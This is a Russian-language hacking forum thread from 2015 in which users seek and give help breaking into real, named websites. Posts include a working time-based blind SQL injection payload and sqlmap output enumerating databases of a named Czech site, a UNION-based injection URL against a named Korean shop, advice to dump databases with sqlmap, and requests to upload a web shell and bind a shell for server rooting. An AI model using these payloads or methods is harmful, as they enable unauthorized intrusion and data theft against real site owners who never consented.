Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    Для чего в шеллах есть пункт "Bind port to /bin/sh [perl]", и порт указан 31337 ?
    Как и когда это использовать, объясните если не трудно
     
  2. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    для бэк коннекта, для порута сервера
     
  3. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    где можно почитать об этом подробней? я не до конца понимаю как это делается, нажать в шелле, а что дальше неизвестно)
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    в закрепленных темах в этом разделе есть тема "повышение привилегий"
     
    _________________________
    Waki likes this.
  5. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Можно ли както слить базу?!

    [​IMG]

    [​IMG]
    или подскажите в icq 660668871
     
    #745 Roger96, 21 Oct 2015
    Last edited: 21 Oct 2015
  6. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    mysql time based там
     
  7. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    на первом или втором? и как ее раскрутить? ну базу слить
     
  8. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    первом, через sqlmap спокойно льется
     
    Roger96 likes this.
  9. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    дану? это где js library? а не подскажешь запрос как сдампить? плиз
    Не сказать что норм льется: http://i.shotnes.com/a/22/1uwpgh51.ozp_56281388e029e.png
     
    #749 Roger96, 22 Oct 2015
    Last edited: 22 Oct 2015
  10. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    что это за породи я на sqlmap
     
  11. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    посмотрел,сравнил - обычный
     
  12. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    HTML:
    http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
    что можно сделать?
     
  13. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    sqlmap берет
    Code:
    ---
    Parameter: id (GET)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))mWsI) AND 'FCqd'='FCqd
    ---
    [12:26:48] [INFO] the back-end DBMS is MySQL
    web server operating system: FreeBSD
    web application technology: PHP 5.6.0, Apache 2.4.10
    back-end DBMS: MySQL 5.0.12
    
    Базы:
    available databases [3]:
    [*] elektroline
    [*] information_schema
    [*] test
     
    R3hab likes this.
  14. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
  15. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
  16. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
  17. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    Code:
    http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=-1/*! and 1=1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()*/+-- 
     
    Га-Ноцри likes this.
  18. TopTG

    TopTG New Member

    Joined:
    14 Oct 2015
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Ребята подскажите, есть сайт на Drupal 7.34. Нет доступа с правами администратора но есть доступ в качестве юзера. Есть ли у этой версии какие то уязвимости? как получить доступ к админу? хочу залить шелл и получить доступ к файлам.
     
  19. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
     
  20. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    HTML:
    http://musics.bdwebs.tk/listen.php?id=fRh_vgS2dFE*
    как то можно использовать эту ошибку?